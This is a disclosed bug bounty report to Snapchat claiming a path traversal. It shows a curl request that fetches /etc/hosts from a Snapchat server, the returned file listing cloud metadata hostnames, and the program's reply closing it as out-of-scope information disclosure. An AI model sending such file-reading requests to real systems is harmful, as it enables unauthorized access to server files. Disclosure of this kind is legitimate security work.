Path Traversal (CWE-22) Snapchat Denied By Hackerone
submitted a report to Snapchat.
September 23, 2022, 9:44pm UTC
curl https://app.snapchat.com/etc/hosts
Impact
PS C:\Users\xexta> curl https://app.snapchat.com/etc/hosts
StatusCode : 200 StatusDescription : OK Content : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine
RawContent : HTTP/1.1 200 OK X-Snapchat-Request-Id: 63269e6500ff097b0df412d1a60001737e6665656c696e736f6e6963652d68726400016d6173 74657232303131333237000101fb X-Snapchat-Notice: Snapchat Private APIs — Unauthorize… Forms : {} Headers : {[X-Snapchat-Request-Id, 63269e6500ff097b0df412d1a60001737e6665656c696e736f6e6963652d68726400016d61 7374657232303131333237000101fb], [X-Snapchat-Notice, Snapchat Private APIs — Unauthorized use is prohibited.], [X-Cloud-Trace-Context, 3c12966885ee2ccaa3d851aba147a537], [Age, 7]…} Images : {} InputFields : {} Links : {} ParsedHtml : System.__ComObject RawContentLength : 126
posted a comment.
September 23, 2022, 9:45pm UTC
PoC https://www.youtube.com/watch?v=BwNZiLe6h0w
- 1 attachment:
- F1949095: Path-Traversal.webm
closed the report and changed the status to Informative.
September 23, 2022, 9:50pm UTC
Thank you for your report,
While we appreciate you bringing this to our attention, as per our program rules page, “Generic information disclosure(e.g. Stack trace) without additional impact” is listed under “Non-qualifying vulnerabilities and exclusions” and is thus out of scope for our program. If you are indeed able to demonstrate how this may be exploited by an attacker, or provide additional detail to the risk this could present, please let us know, and we will be happy to take another look.
We do appreciate your efforts here, and we hope you’ll continue reporting security issues to us in the future.
Thanks, and good luck with your future bug hunting.
